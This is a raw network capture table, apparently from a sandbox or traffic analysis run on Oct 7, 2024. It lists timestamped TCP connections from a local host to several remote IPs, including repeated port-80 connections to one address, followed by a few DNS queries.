                                                                                                                                      Oct 7, 2024 03:23:40.769294977 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.769367933 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.769521952 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.769546986 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.769560099 CEST61169443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.769566059 CEST4436116913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.771332026 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.771358967 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.771445036 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.771555901 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.771579981 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.812525034 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.813055992 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.813076019 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.813416004 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.813421965 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.816986084 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.817153931 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.817187071 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.817209959 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.817236900 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.817373037 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.817384005 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.817392111 CEST61170443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.817397118 CEST4436117013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.829360962 CEST6116180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:40.829617977 CEST6117580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:40.834461927 CEST8061175185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.834600925 CEST8061161185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.834714890 CEST6116180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:40.834882975 CEST6117580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:40.834882975 CEST6117580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:40.839948893 CEST8061175185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.910896063 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.911040068 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.911083937 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.911222935 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.911232948 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:40.911254883 CEST61171443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:40.911261082 CEST4436117113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.306282043 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.359208107 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.359241962 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.360284090 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.360302925 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.412879944 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.419043064 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.419076920 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.419771910 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.419785023 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.441934109 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.447295904 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.447310925 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.447877884 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.447887897 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.459222078 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.459429979 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.459491968 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.463897943 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.463934898 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.463963032 CEST61172443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.463978052 CEST4436117213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.568331003 CEST8061175185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.568427086 CEST6117580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:41.614937067 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.615039110 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.615108967 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.639322042 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.639358997 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.639400959 CEST61173443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.639416933 CEST4436117313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.652754068 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.653280020 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.653347969 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.673566103 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.673566103 CEST61174443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:41.673593044 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:41.673615932 CEST4436117413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.218991041 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:43.219017029 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.219080925 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:43.220427990 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:43.220441103 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.235095024 CEST6117580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:43.235440016 CEST6117780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:43.240509033 CEST8061175185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.240540981 CEST8061177185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.240581989 CEST6117580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:43.240629911 CEST6117780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:43.240765095 CEST6117780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:43.245579004 CEST8061177185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.904061079 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.904172897 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:43.910325050 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:43.910335064 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.910773039 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.940942049 CEST8061177185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:43.941020012 CEST6117780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:43.954608917 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.140194893 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.183408022 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529545069 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529613018 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529614925 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.529647112 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529660940 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.529669046 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529680967 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.529716969 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529773951 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529783964 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.529810905 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.529855013 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.617702961 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.617769003 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.617785931 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.617826939 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.617872953 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.617901087 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.617957115 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.618091106 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.618103027 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:44.618120909 CEST61176443192.168.2.4104.102.49.254
                                                                                                                                      Oct 7, 2024 03:23:44.618125916 CEST44361176104.102.49.254192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:45.533343077 CEST6117780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:45.533657074 CEST6117880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:45.538568020 CEST8061178185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:45.538606882 CEST8061177185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:45.538700104 CEST6117880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:45.538746119 CEST6117780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:45.538923025 CEST6117880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:45.543741941 CEST8061178185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:46.233464956 CEST8061178185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:46.233567953 CEST6117880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:47.883337021 CEST6117880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:47.883658886 CEST6117980192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:47.888771057 CEST8061178185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:47.888813972 CEST8061179185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:47.888851881 CEST6117880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:47.888900995 CEST6117980192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:47.889134884 CEST6117980192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:47.893954039 CEST8061179185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:48.577404976 CEST8061179185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:48.577532053 CEST6117980192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:50.124878883 CEST6117980192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:50.125518084 CEST6118080192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:50.130705118 CEST8061179185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:50.130774975 CEST8061180185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:50.130862951 CEST6117980192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:50.130887032 CEST6118080192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:50.141510010 CEST6118080192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:50.146543980 CEST8061180185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:50.834237099 CEST8061180185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:50.834327936 CEST6118080192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:52.463737011 CEST6118080192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:52.464128971 CEST6118180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:52.468789101 CEST8061180185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:52.468882084 CEST6118080192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:52.468971968 CEST8061181185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:52.469050884 CEST6118180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:52.469249964 CEST6118180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:52.474057913 CEST8061181185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:53.168205023 CEST8061181185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:53.168284893 CEST6118180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:54.673477888 CEST6118180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:54.673738003 CEST6118280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:54.678700924 CEST8061181185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:54.678740978 CEST8061182185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:54.678802967 CEST6118180192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:54.678841114 CEST6118280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:54.678998947 CEST6118280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:54.683804035 CEST8061182185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:55.810066938 CEST8061182185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:55.810261965 CEST6118280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:57.441107035 CEST6118280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:57.441418886 CEST6118380192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:57.446459055 CEST8061182185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:57.446536064 CEST6118280192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:57.447170019 CEST8061183185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:57.447367907 CEST6118380192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:57.447499990 CEST6118380192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:57.452744961 CEST8061183185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:58.163953066 CEST8061183185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:58.164686918 CEST6118380192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:58.381154060 CEST6118480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:58.386003017 CEST8061184185.215.113.37192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:58.386113882 CEST6118480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:58.386262894 CEST6118480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:58.391143084 CEST8061184185.215.113.37192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:59.079961061 CEST8061184185.215.113.37192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:59.080055952 CEST6118480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:59.081957102 CEST6118480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:59.086802959 CEST8061184185.215.113.37192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:59.307483912 CEST8061184185.215.113.37192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:59.307684898 CEST6118480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:59.310554981 CEST6118480192.168.2.4185.215.113.37
                                                                                                                                      Oct 7, 2024 03:23:59.688688040 CEST6118380192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:59.689153910 CEST6118580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:59.693953037 CEST8061183185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:59.694024086 CEST6118380192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:59.694035053 CEST8061185185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:59.694104910 CEST6118580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:59.694327116 CEST6118580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:23:59.699131012 CEST8061185185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:00.397636890 CEST8061185185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:00.397727966 CEST6118580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:02.002975941 CEST6118580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:02.003328085 CEST6118680192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:02.008223057 CEST8061186185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:02.008263111 CEST8061185185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:02.008311987 CEST6118680192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:02.008347034 CEST6118580192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:02.008500099 CEST6118680192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:02.013286114 CEST8061186185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:02.726773977 CEST8061186185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:02.727022886 CEST6118680192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:04.236856937 CEST6118680192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:04.237313986 CEST6118780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:04.242115974 CEST8061186185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:04.242182016 CEST8061187185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:04.242250919 CEST6118680192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:04.242280960 CEST6118780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:04.242413044 CEST6118780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:04.247261047 CEST8061187185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:04.250015020 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:24:04.255431890 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:05.063016891 CEST8061187185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:05.063116074 CEST6118780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:06.723700047 CEST6118780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:06.723998070 CEST6118880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:06.729074001 CEST8061188185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:06.729127884 CEST8061187185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:06.729162931 CEST6118880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:06.729202986 CEST6118780192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:06.729348898 CEST6118880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:06.734620094 CEST8061188185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.121756077 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:07.121845007 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.121920109 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:07.123307943 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:07.123343945 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.450479031 CEST8061188185.215.113.43192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.451190948 CEST6118880192.168.2.4185.215.113.43
                                                                                                                                      Oct 7, 2024 03:24:07.766136885 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.766222000 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:07.767461061 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:07.767488956 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.767842054 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:07.792356014 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:07.835431099 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.246923923 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.246985912 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.247014999 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.247025967 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.247087955 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.247129917 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.247129917 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.247159004 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.333503008 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.333596945 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.333656073 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.333725929 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.335648060 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.335719109 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.335733891 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.335793018 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.335820913 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.335874081 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.336255074 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.336287975 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.336316109 CEST61189443192.168.2.423.199.218.33
                                                                                                                                      Oct 7, 2024 03:24:08.336330891 CEST4436118923.199.218.33192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.339900017 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:08.340001106 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.340092897 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:08.340403080 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:08.340441942 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.806489944 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.806571960 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:08.807699919 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:08.807725906 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.808079004 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:08.809154034 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:08.809154034 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:08.809254885 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:09.273288012 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:09.273705006 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:09.273802042 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:09.273910999 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:09.273910999 CEST61190443192.168.2.4104.21.53.8
                                                                                                                                      Oct 7, 2024 03:24:09.273961067 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      Oct 7, 2024 03:24:09.273992062 CEST44361190104.21.53.8192.168.2.4
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Oct 7, 2024 03:22:20.427946091 CEST138138192.168.2.4192.168.2.255
                                                                                                                                      Oct 7, 2024 03:23:14.250114918 CEST6473753192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:14.251446009 CEST5636853192.168.2.41.1.1.1
                                                                                                                                      Oct 7, 2024 03:23:14.336265087 CEST53563681.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.336280107 CEST53647371.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.336468935 CEST53597061.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:14.336743116 CEST53564471.1.1.1192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:15.267945051 CEST5375753192.168.2.41.1.1.1
